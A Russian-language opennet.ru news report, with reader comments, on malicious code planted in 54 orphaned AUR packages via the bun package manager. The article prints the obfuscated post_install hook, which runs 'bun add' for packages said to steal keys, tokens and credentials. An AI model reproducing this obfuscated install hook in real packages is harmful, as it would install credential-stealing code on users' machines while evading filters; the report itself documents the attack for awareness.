В AUR осуществлена подстановка вредоносного кода ещё в 54 пакета

14.06.2026 14:41 (MSK)

Несмотря на меры, предпринятые разработчиками Arch Linux, деятельность по подстановке вредоносного кода в репозитории AUR (Arch User Repository) не остановлена. Несколько часов назад вредносный код подставлен ещё в 54 пакета, оставшихся без сопровождающих (история отмены вредоносных правок). В отличие от позавчерашних атак, вместо пакетного менеджера npm для установки вредоносных зависимостей на этот раз задействована платформа bun. Для обхода реализованных фильтров в функцию post_install вставляется обфусцированная строка, в которой вызывается команда "bun add" для установки пакетов с вредоносным кодом, осуществляющим сканирование и отправку на внешний сервер ключей, токенов и учётных данных.


   post_install() {
       $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s'
   }

исправить +9 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/65685-aur

Ключевые слова: aur, arch, malware, bun

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (25)

1.1, ы (?), 14:52, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
> AUR > @ > looks inside > @ > npm well...

1.2, Аноним (2), 15:01, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	–3 +/–
А зачем вообще аур сегодня? Актуально было 20 лет назад, потому что rpm собирать было ещё той канителью и тут простой сборочный скрипт. Но аур всегда был помойкой.

1.3, Аноним (3), 15:03, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
может проблема не в aur, а в npm например?

2.9, Аноним (9), 15:51, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
Крутая логика. Дом вскрыли монтировкой, потому что там не было замка, камер и систем защиты. Вывод - виноваты монтировки.

2.22, Аноним (22), 16:50, 14/06/2026 [^] [^^] [^^^] [ответить]

+/–

> может проблема не в aur, а в npm например?

Тем временем в новости:

> в этот раз задействована платформа bun

Да, проблема в npm. 🤦

1.4, Аноним (4), 15:10, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	–3 +/–
AUR ВСЁ !

2.6, bitman (??), 15:25, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
не AUR, а orphaned

2.7, Аноним (7), 15:43, 14/06/2026 Скрыто ботом-модератором [к модератору]	+/–

1.5, Аноним (5), 15:15, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
А что, flatpack не помог?

2.23, Аноним (22), 16:52, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
Помог. Ведь ломают AUR, а не Flatpack. Ты даже заголовок не осилил. 🤦

1.8, Аноним (7), 15:51, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Почему заброшенные пакеты не удаляют, а передают любому желающему? Предупреждение, стандартные 30 дней не размышление, нет ответа - удаление.

2.10, Аноним (2), 15:55, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
У тебя так сопровождающих не останется. А ответ это power tripping, результат никого не волнует.

2.18, Аноним (18), 16:29, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
> 30 дней не размышление даже в отпуск не съездить

2.27, небесный ученый (?), 17:15, 14/06/2026 [^] [^^] [^^^] [ответить]

+/–

> Почему заброшенные пакеты не удаляют

удаляются, раз в два года
https://wiki.archlinux.org/title/AUR_Cleanup_Day

> а передают любому желающему?

а почему бы и нет ?
любой желающий может прислать пакет(точнее рецепт сборки пакета);
любой желающий может поддерживать пакет;
любой желающий может поднять брошенное знамя;
минимум ограничений.
Да риски всегда есть, отсутствие надзирателя подразумевает самодисциплину.
Ограбить тебя могут даже в самом свободном городе в темной подворотне, но и в тюрьме где будешь под полным контролем ты не застрахован от неприятностей.

1.11, Аноним (11), 15:56, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Зачем они это делают? На данных пользователей арча можно как-то поживиться?

2.26, iPony128052 (?), 17:06, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
Ну да. Тот же криптокошелёк украсть или просто плюс один к ботнету.

1.12, АДмин (?), 15:59, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
Мне вот интересно почему атаки именно на Arch ? Не Void и не NixOS а именно Arch ??? Может это личное ???

2.13, Аноним (2), 16:06, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
На серверах популярен, свежий относительно стабильный софт и роллинг. Ну, есть такой миф, что сабж норм. Атака на жсников, и ты правильно можешь предположить, что жсники в него верят в силу низкой квалификации и ограниченного опыта. Впрочем, из альтернатив у тебя только Федора и это корпоративная шляпа с экспериментами, регулярно переустанавливать надо и без гарантий.

3.15, anonymos (?), 16:20, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
> Впрочем, из альтернатив у тебя только Федора Убей себя ап стену

3.16, Аноним (4), 16:21, 14/06/2026 [^] [^^] [^^^] [ответить]	–1 +/–
https://get.opensuse.org/ru/tumbleweed/

2.14, Аноним (14), 16:06, 14/06/2026 Скрыто ботом-модератором [к модератору]	+/–

2.19, Аноним (19), 16:30, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
Потому что дристр для школоты btw

2.25, iPony128052 (?), 17:05, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
Чем больше коэффициент популярности помноженный на дырявость - тем логичнее больше атак. У арча он явно выше чем у Void и NixOS

1.17, Аноним (17), 16:25, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	+/–
npm config set ignore-scripts true

2.24, Аноним (22), 16:53, 14/06/2026 [^] [^^] [^^^] [ответить]	+/–
И как это тебе поможет?

1.20, Аноним (7), 16:38, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
Преступная группа идёт по пути "наибольшего" сопротивления. А почему? Вот, если понять её сверхзадачу...

игнорирование участников | лог модерирования

Добавить комментарий

Текст: